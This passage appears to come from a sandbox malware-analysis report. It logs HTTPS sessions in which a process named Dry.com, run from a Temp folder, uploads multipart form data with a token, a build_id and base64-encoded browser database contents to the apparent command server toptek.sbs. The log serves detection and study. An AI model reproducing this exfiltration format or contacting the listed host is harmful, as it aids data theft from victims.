                                                                                                                                                                                                                                                                                  2024-12-23 05:21:44 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 55 53 30 52 39 52 49 35 38 59 4d 37 59 4d 47 4c 58 34 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 55 53 30 52 39 52 49 35 38 59 4d 37 59 4d 47 4c 58 34 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 55 53 30 52 39 52 49 35 38 59 4d 37 59 4d 47 4c 58 34 57 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                  Data Ascii: ------US0R9RI58YM7YMGLX4W4Content-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------US0R9RI58YM7YMGLX4W4Content-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------US0R9RI58YM7YMGLX4W4Cont
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:44 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-23 05:21:46 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:21:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:21:46 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49770 | 94.130.188.57 | 443 | 7548 | C:\Users\user\AppData\Local\Temp\245347\Dry.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:21:47 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----G47GLNG4OZU3EU3OZC26
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 142457
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:21:47 UTC | 16355 | OUT | Data Ascii: ------G47GLNG4OZU3EU3OZC26Content-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------G47GLNG4OZU3EU3OZC26Content-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------G47GLNG4OZU3EU3OZC26Cont
2024-12-23 05:21:49 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:21:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:21:49 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49771 | 94.130.188.57 | 443 | 7548 | C:\Users\user\AppData\Local\Temp\245347\Dry.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:21:48 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----G47GLNG4OZU3EU3OZC26
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 493
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:21:48 UTC | 493 | OUT | Data Ascii: ------G47GLNG4OZU3EU3OZC26Content-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------G47GLNG4OZU3EU3OZC26Content-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------G47GLNG4OZU3EU3OZC26Cont
2024-12-23 05:21:49 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:21:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:21:49 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49772 | 94.130.188.57 | 443 | 7548 | C:\Users\user\AppData\Local\Temp\245347\Dry.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:21:52 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----2D2VASR9H4E3EUS0HD2V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 169765
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:52 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 32 44 32 56 41 53 52 39 48 34 45 33 45 55 53 30 48 44 32 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 32 44 32 56 41 53 52 39 48 34 45 33 45 55 53 30 48 44 32 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 32 44 32 56 41 53 52 39 48 34 45 33 45 55 53 30 48 44 32 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                  Data Ascii: ------2D2VASR9H4E3EUS0HD2VContent-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------2D2VASR9H4E3EUS0HD2VContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------2D2VASR9H4E3EUS0HD2VCont
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:52 UTC16355OUTData Raw: 55 67 51 6b 39 50 54 45 56 42 54 69 42 45 52 55 5a 42 56 55 78 55 49 45 5a 42 54 46 4e 46 49 45 35 50 56 43 42 4f 56 55 78 4d 4b 56 41 45 42 68 63 72 4b 77 46 5a 64 47 46 69 62 47 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 46 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 4e 78 62 47 6c 30 5a 56 39 7a 5a 58 46 31 5a 57 35 6a 5a 53 68 75 59 57 31 6c 4c 48 4e 6c 63 53 6d 42 66 77 4d 48 46 78 55 56 41 59 4e 68 64 47 46 69 62 47 56 31 63 6d 78 7a 64 58 4a 73 63 77 52 44 55 6b 56 42 56 45 55 67 56 45 46 43 54 45 55 67 64 58 4a 73 63 79 68 70 5a 43 42 4a 54 6c 52 46 52 30 56 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 49 45 46 56 56 45 39 4a 54 6b 4e 53 52 55 31 46 54
                                                                                                                                                                                                                                                                                  Data Ascii: UgQk9PTEVBTiBERUZBVUxUIEZBTFNFIE5PVCBOVUxMKVAEBhcrKwFZdGFibGVzcWxpdGVfc2VxdWVuY2VzcWxpdGVfc2VxdWVuY2UFQ1JFQVRFIFRBQkxFIHNxbGl0ZV9zZXF1ZW5jZShuYW1lLHNlcSmBfwMHFxUVAYNhdGFibGV1cmxzdXJscwRDUkVBVEUgVEFCTEUgdXJscyhpZCBJTlRFR0VSIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FT
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:53 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:21:53 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49773 | 94.130.188.57 | 443 | 7548 | C:\Users\user\AppData\Local\Temp\245347\Dry.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:21:53 UTC | 324 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----ZCT0RQ16P8YM7QI589Z5
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: toptek.sbs
    Content-Length: 66001
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-23 05:21:53 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 5a 43 54 30 52 51 31 36 50 38 59 4d 37 51 49 35 38 39 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 54 30 52 51 31 36 50 38 59 4d 37 51 49 35 38 39 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 54 30 52 51 31 36 50 38 59 4d 37 51 49 35 38 39 5a 35 0d 0a 43 6f 6e 74
    Data Ascii: ------ZCT0RQ16P8YM7QI589Z5Content-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------ZCT0RQ16P8YM7QI589Z5Content-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------ZCT0RQ16P8YM7QI589Z5Cont
2024-12-23 05:21:53 UTC | 16355 | OUT | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-23 05:21:53 UTC | 16355 | OUT | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
